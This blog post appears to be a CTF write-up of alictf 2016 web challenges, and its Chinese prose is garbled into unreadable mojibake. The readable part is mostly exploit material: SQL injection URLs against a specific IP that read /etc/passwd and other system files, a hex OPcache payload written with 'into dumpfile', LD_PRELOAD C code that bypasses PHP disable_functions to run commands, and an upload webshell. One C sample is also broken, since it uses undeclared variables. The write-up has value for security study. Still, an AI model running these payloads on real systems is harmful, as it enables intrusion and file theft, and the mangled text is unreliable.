LoRexxar's Blog

alictf2016_web_writeup

2016/06/06

鎰熻鏃堕棿鎬荤畻鏄浆浜嗕竴骞达紝鍘诲勾涔熷ぇ姒傛槸alictf鎵嶅紑濮嬭兘鍋氬嚭绛惧埌棰樼洰浠ュ鐨勯鐩紝浠婂勾寮烘捀浜嗕竴娉lictf锛屼笉寰椾笉璇达紝鍙堥亣鍒拌摑鑾茶姳+0ops鍑洪锛寃eb鐪熺殑闅惧害寰堥珮锛屾瘮杈冭泲鐤肩殑鏄痟omework锛岃瀹炶瘽鏄竴閬撴兂娉曞緢濂藉緢濂界殑棰樼洰锛屼絾鏄己琛屽拰asis鏈夊尯鍒紝鍐欎簡瀹炴垬鎯呭喌涓嶅悎鐨勬潈闄愨.涓嶇鎬庝箞璇磋繕鏄浜嗗緢澶氫笢瑗匡紝鏁寸悊涓媤p鈥


find password

棰樼洰鍏跺疄鎸鸿泲鐤肩殑锛屾湰鏉ユ槸绠鍗曠殑鐧婚檰鐩叉敞锛屼絾鏄嵈鍐欎簡寰堝濂囨殑杩囨护锛屽鑷村啓鑴氭湰鐨勬椂鍊欏悇绉嶅嚭闂锛岃姳浜嗗緢闀挎椂闂存敼锛屼笉杩囩敤浜嗕互鍓嶇殑閫氱敤鑴氭湰杩樻槸鎰熻涓嶉敊鐨勶紝鍦╯qlmap涓嶈兘鐢ㄧ殑鎯呭喌锛岃繕鏄彲浠ョ敤锛岀粨灏捐创github閾炬帴

鍏堣棰樼洰锛屽湪login鐨勬椂鍊欐湁涓涓猚heck璇锋眰瀛樺湪娉ㄥ叆锛屽彲浠ヤ紭鍖栨垚鐩叉敞锛岀櫥闄嗕竴涓笉瀛樺湪鐨勮处鎴锋槸鎻愮ず璐﹀彿瀵嗙爜閿欒锛岀櫥闄嗕竴涓瓨鍦ㄧ殑璐﹀彿鏃舵彁绀虹櫥闄嗘垚鍔熴

杩樻湁涓浜涜繃婊わ紝鍩烘湰閮借兘缁曪紝浣嗘槸鎼炲緱鎴戝啓鑴氭湰鍐欑殑寰堟伓蹇冦傘傘

1
select count table table_schema from where or and 绌烘牸 # / columns

鑰屼笖鏄浛鎹负绌猴紝鎵浠ョ洿鎺abtablele杩欐牱灏卞ソ浜嗐

github鑴氭湰

homework

棰樼洰寰堥毦锛屽嚑涔庣畻鏄渶杩戞捀寰楁渶闅剧殑棰樼洰浜嗭紝浣嗘槸韪╀簡鏉冮檺鐨勫潙锛屽啀鍔犱笂鍑洪浜哄己琛岄伃娲烇紝瀵艰嚧寰堝闂閮藉拰鏈湴宸紓寰堝ぇ锛岃鎴戜滑鏉ヤ竴鐐圭偣鍎胯鈥

婧愮爜

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
detail.php
<?php
include("conn.php");
if (!isset($_SESSION['username'])) {
header("Location: login.php");
exit();
}
$sql = "SELECT brief FROM homework WHERE id= '" . $_GET['id'] . "'";
$result = query($sql);
if($result){
$result=$result[0];
}
?>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1,maximum-scale=1.0">
<title>Homework System</title>
<link href="css/bootstrap.css" rel="stylesheet">
<link rel="stylesheet" href="css/main.css">
</head>
<body>
<div class="container">
<fieldset>
<div class="panel panel-success">
<div class="panel-heading">
<legend>
Homework System
<a href="logout.php" class="return">Sign Out </a>
<br/>
</legend>
</div>
</div>
</fieldset>
<fieldset>
<div class="panel panel-info">
<div class="panel-heading">
<h3 class="panel-title"><legend>Your Homework</legend></h3>
</div>
<div class="panel-body">
<?php
if($result){
echo $result["brief"];
}
?>
</div>
</div>
</fieldset>
</div>
</script>
<script src="js/jquery-1.12.2.min.js"></script>
<script src="js/bootstrap.min.js"></script>
</body>
</html>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
<?php
include("conn.php");
if(!isset($_POST["detail"]))
die();
$detail=$_POST["detail"];
if(!preg_match("/^\w+$/",$detail))
die("Only allow [\w+]!");
if(isset($_FILES['pic']['name'])&&$_FILES['pic']['name']!=="") {
$picname = $_FILES['pic']['name'];
if(!preg_match("/^[\w.]+$/",$picname))
die("Filename only allow /^[\w.]+$/");
$picsize = $_FILES['pic']['size'];
if ($picname != "") {
if ($picsize > 1024000) {
die('Too big!');
}
$pics = date("YmdHis")."-".$picname;
$pic_path = "upload/". $pics;
if(stripos($picname,"ph")!==false||stripos($picname,"pht")!==false||stripos($picname,"php5")!==false||stripos($picname,"php4")!==false||stripos($picname,"php3")!==false)
file_put_contents($pic_path,"bad man!");
else
move_uploaded_file($_FILES['pic']['tmp_name'], $pic_path);
$sql = "INSERT INTO homework(username,brief) values('".$_SESSION['username']."','$detail')";
query($sql);
echo "Upload Success锛丳ath:".$pic_path;
}
else
die("Where is your homework?");
}
else
die("Where is your homework?");
function getRandChar($length){
$str = null;
$strPol = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz";
$max = strlen($strPol)-1;
for($i=0;$i<$length;$i++){
$str.=$strPol[rand(0,$max)];
}
return $str;
}

棣栧厛鏄笂浼犻〉闈㈠瓨鍦ㄦ敞鍏ワ紙杩欓噷寮濮嬫寲鍧戯級

1
2
3
http://121.40.50.146/detail.php?id=124'+and+'1'='1
http://121.40.50.146/detail.php?id=124'+and+'1'='2

棣栧厛鏄彂鐜版敞鍏ョ偣锛屾祴璇曡繃婊ゅ彂鐜版病鏈変换浣曡繃婊わ紝閭e氨鐩存帴娉ㄥ惂

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
http://121.40.50.146/detail.php?id=-124'+union+select+user()%23
fire@localhost
firecms
http://121.40.50.146/detail.php?id=-124'+UNION+SELECT+COUNT(*)+from+information_schema.tables+WHERE+table_schema+=+DATABASE()+limit+0,1%23
2
homework
user
http://121.40.50.146/detail.php?id=-124'+UNION+SELECT+COUNT(*)+from+information_schema.columns+WHERE+table_name+=+'homework'+limit+0,1%23
3
id
username
brief
http://121.40.50.146/detail.php?id=-124'+UNION+SELECT+count(*)+from+information_schema.columns+WHERE+table_name+=+'user'+limit+0,1%23
2
username
password

棣栧厛鏄敞鍏ユ病鏈変换浣曟敹鑾凤紝閭d箞寮濮嬪皾璇曡鏂囦欢

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
http://121.40.50.146/detail.php?id=-124'+UNION+SELECT+load_file('/etc/passwd')%23
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
ntp:x:103:109::/home/ntp:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:114:MySQL Server,,,:/nonexistent:/bin/false
/etc/hosts
127.0.0.1 localhost 127.0.1.1 localhost.localdomain localhost # The following lines are desirable for IPv6 capable hosts ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters 10.251.236.147 iZ23bb0g4vdZ
/etc/group
root:x:0: daemon:x:1: bin:x:2: sys:x:3: adm:x:4:syslog tty:x:5: disk:x:6: lp:x:7: mail:x:8: news:x:9: uucp:x:10: man:x:12: proxy:x:13: kmem:x:15: dialout:x:20: fax:x:21: voice:x:22: cdrom:x:24: floppy:x:25: tape:x:26: sudo:x:27: audio:x:29: dip:x:30: www-data:x:33: backup:x:34: operator:x:37: list:x:38: irc:x:39: src:x:40: gnats:x:41: shadow:x:42: utmp:x:43: video:x:44: sasl:x:45: plugdev:x:46: staff:x:50: games:x:60: users:x:100: nogroup:x:65534: libuuid:x:101: netdev:x:102: crontab:x:103: syslog:x:104: messagebus:x:105: fuse:x:106: mlocate:x:107: ssh:x:108: ntp:x:109: stapdev:x:110: stapusr:x:111: stapsys:x:112: ssl-cert:x:113: mysql:x:114:

娴嬭瘯鍙戠幇鍙互鍐欐枃浠讹紝浣嗘槸鍙湁mysql鐢ㄦ埛鐨勬潈闄愶紙鏈寮濮嬪叾瀹炴病鏈夋剰璇嗗埌锛屽悗鏉ヨ俯鍧戞墠鍙戠幇锛

鐢变簬杩欎釜鏉冮檺闂锛屾墍浠ysql娌℃湁璇讳换浣曢櫎浜755鏂囦欢浠ュ鐨勬枃浠讹紝apache鍜宲hp鐨勯厤缃枃浠堕兘娌℃湁璇诲埌銆

鑺变簡寰堥暱鏃堕棿娴嬭瘯涓轰粈涔堣涓嶅埌涓滆タ锛屾浘缁忎互涓簃ysql鍦╠ocker涓娾.绗簩澶╅殢鎵嬫壂鐩綍鍙戠幇鏂版敹鑾

php opcache

鎵洰褰曞彂鐜颁簡寰堥噸瑕佺殑info.php鍜宲hpinfo.php鏂囦欢锛屾晠鍚嶆濇剰锛屼竴涓槸phpinfo().

info.php涓槸鎻愮ず锛堥鐩叧浜嗗繕璁颁繚瀛橈級锛屽ぇ鑷存剰鎬濇槸flag鍦ㄦ牴鐩綍锛宒isable_function ban浜嗕綘鑳芥兂鍒扮殑澶ч儴鍒嗗嚱鏁帮紝浣犻渶瑕佹兂鍒殑鍔炴硶銆

鏌ョ湅phpinfo()锛屼竴鐪煎彂鐜皃hp opcache寮鍚紝浜嗙劧浜庡績锛屽紑濮嬫祴璇曘

鐢变簬鍓嶆鏃堕棿杩橀亣鍒颁竴涓繖鏍风殑瀹炴垬棰樼洰锛屾墍浠ュ紑濮嬩竴鐩村緢椤哄埄
鏇剧粡鍐欑殑asis棰樼洰wp,閲岄潰灏辨槸杩欎釜娲

鑰屼笖鏈湴娴嬭瘯閫氳繃锛屼絾鏄嵈鍙戠幇涓涓泲鐤肩殑浜嬫儏鏄痮pcache榛樿鍙湁www鐨600,mysql瀹為檯涓婃病鏈変慨鏀圭殑鏉冮檺(浠ヨ嚦浜庝腑閫旈鐩寕浜嗛噸鍚箣鍚庯紝杩囦簡涓娈垫椂闂村嚭棰樹汉鎯宠捣鏉ヤ簡鎵嶄慨鏀逛簡opcache鏉冮檺鈥.)

涓嶇鎬庝箞鏍凤紝杩滅▼-鏈湴=鏃犵┓杩欎釜閬撶悊杩樻槸涓嶅彉锛屾祴璇曞彂鐜拌兘鎴愬姛鍐欏叆銆

ps:涓棿閬囧埌浜嗕竴涓緢澶х殑闂锛屼篃鏄俯浜嗗潙鎵嶅紕鏄庣櫧锛 涓鑸潵璇达紝鎴戜滑浣跨敤娉ㄥ叆鐐瑰啓鏂囦欢涓嶄細鍐欎竴涓獁ebshell杩涘幓锛堝洜涓烘潈闄愶級锛屾墍浠ュ緢灏戜細鐢╩ysql鍐欎簩杩涘埗杩欐牱鐨勬枃浠惰繘鍘伙紝鍚庢潵鍙戠幇intofile鍦ㄤ娇鐢ㄧ殑鏃跺欎細鎶16杩涘埗鐨00杩欐牱鐨勪笢瑗胯浆涓篭0,鐒跺悗灏辩偢浜嗭紝浣犻渶瑕佷娇鐢╠umpfile

1
http://121.40.50.146/detail.php?id=-124'+UNION+SELECT+0x4f504341434845003339623030356164373734323863343237383831343063363833396536323031d004000000000000000000000000000000000000000000000000000000000000751f2b0500000000a8010000000000000200000000000008000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0c0000005003000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000a80100000000000001000000040000000000000000000000ffffffff070000000002000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000700000012000000feffffff0000000000000000000000000000000000080000ffffffff0000000000000000e051840000000000010000000700000012000000feffffff0000000000000000000000000000000010000000ffffffff0000000000000000c04a84000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000d00400000000000000020000000000000000000000000000000000000000000000000000000000000000000067285100000000000000000004000000060600004c720f400838aed51e000000000000002f686f6d652f777777726f6f742f64656661756c742f64646f672e7068700000000000000000000000000000000000000000000000000000000000000000000070020000000000000600000000000000900200000000000006000000ffffffffc0020000000000000600000008000000e00200000000000006000000ffffffff080300000000000006000000ffffffff280300000000000006000000ffffffff010000000000000004000000ffffffff01000000060600006756a715530600800600000000000000707574656e7600000000000006060000d57bb4bed65a7ef917000000000000004c445f5052454c4f41443d2f746d702f64646f672e736f000100000006060000687f9a7c0100008004000000000000006d61696c000000000000000006060000afe020ba620f68c00b0000000000000061406c6f63616c686f737400000000000100000006060000051500000000008000000000000000000000000000000000000000000606000096db284491abf2ce0d000000000000004861636b2062792064646f672100000040958d000000000070000000000000000000000001000000020000003d080108309e89000000000010000000010000006000000002000000020000004101080880e189000000000000000000000000006000000000000000020000008108082440958d0000000000b0000000200000000000000005000000030000003d080108309e890000000000300000000100000060000000020000000300000041010808309e890000000000400000000200000070000000020000000300000041010808309e890000000000400000000300000080000000020000000300000041010808309e890000000000400000000400000090000000020000000300000041010808309e8900000000004000000005000000a000000002000000030000004101080880e189000000000000000000000000006000000000000000030000008108082430308a000000000050000000000000000000000000000000040000002801080870178e0000000000600000000000000000000000ffffffff040000003e010808+into+dumpfile+'/tmp/OPcache/39b005ad77428c42788140c6839e6201/var/www/html/upload/20160606000605-20140410104212706.php.bin'#

鍦ㄦ垚鍔熷啓鍏ュ彧鏈夛紝鎰忚瘑鍒癲isable_function鐨勯棶棰樻病鏈夎В鍐炽

鍒╃敤鐜鍙橀噺LD_PRELOAD鏉ョ粫杩噋hp disable_function鎵ц绯荤粺鍛戒护

鏂囩珷鍘熷潃

褰撶劧杩樻槸閭e彞璇濓紝鏈湴娴嬭瘯perfect鈥﹁繙绋嬭宕┿

棣栧厛鍐欎釜c浠g爜

1
2
3
4
5
6
7
8
9
10
11
12
13
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void payload() {
system("echo '233' > /tmp/test");
}
int geteuid() {
if (getenv("LD_PRELOAD") == NULL) { return 0; }
unsetenv("LD_PRELOAD");
payload();
}

缂栬瘧涓.so

1
2
3
$ gcc -c -fPIC hack.c -o hack
$ gcc -shared hack -o hack.so

鐒跺悗缂栧啓php

1
2
3
4
<?php
putenv("LD_PRELOAD=/var/www/hack.so");
mail("a@localhost","","","","");
?>

閮戒笂浼犱笂鍘讳箣鍚庢祴璇曪紝鏋滀笉鍏剁劧澶辫触浜

杩欓噷灏辨槸鏉冮檺鐨勫師鍥犱簡锛屾垜鐢╩ysql浼犱簡.so锛岀劧鍚echo '233' > /tmp/test锛岃宼est鏄垜鐢╩ysql鏂板缓鐨勬枃浠讹紝杩欓噷鏉冮檺涓嶅鍐欎笉杩涘幓锛屽悗鏉,鎹簡鍏ㄧ▼php鏂规硶銆

鍦╱pload涓嬪啓鍏pload.php杩樻湁璇绘枃浠剁殑php

1
2
3
4
5
6
7
8
9
10
11
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="file" id="file" />
<br />
<input type="submit" name="submit" value="Submit" />
</form>
<?php
error_reporting(-1);
ini_set("display_errors", 1);
move_uploaded_file($_FILES['file']['tmp_name'],$_GET['a2']);
echo "Hack by ddog!";
?>

璇绘枃浠剁敤浜嗚繖涓

1
highlight_file(__FILE__)

閲嶆柊娴嬭瘯涔嬪悗鍙戠幇鍑犱箮鑳芥兂鍒扮殑璇绘枃浠跺拰鍒楃洰褰曟柟寮忛兘琚玝an浜嗭紝娌″姙娉曪紝閭d箞鐢╟璇█杩涜鍒楃洰褰曡鏂囦欢鈥

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#include<stdlib.h>
#include<stdio.h>
#include<string.h>
#include<dirent.h>
void payload() {
FILE *fp;
char buf[100];
dir = opendir("/");
fp = fopen("/tmp/ddog123", "w");
fgets(buf, 100, fp2);
fputs(buf, fp);
while ((dp = readdir(dir)) != NULL) {
fputs(dp->d_name, fp);
}
fclose(fp);
closedir(dir);
}
int geteuid() {
if (getenv("LD_PRELOAD") == NULL) {
return 0;
}
unsetenv("LD_PRELOAD");
payload();
}

CATALOG
  1. 1. find password
  2. 2. homework
    1. 2.1. 婧愮爜
    2. 2.2. 棣栧厛鏄笂浼犻〉闈㈠瓨鍦ㄦ敞鍏ワ紙杩欓噷寮濮嬫寲鍧戯級
    3. 2.3. php opcache
    4. 2.4. 鍒╃敤鐜鍙橀噺LD_PRELOAD鏉ョ粫杩噋hp disable_function鎵ц绯荤粺鍛戒护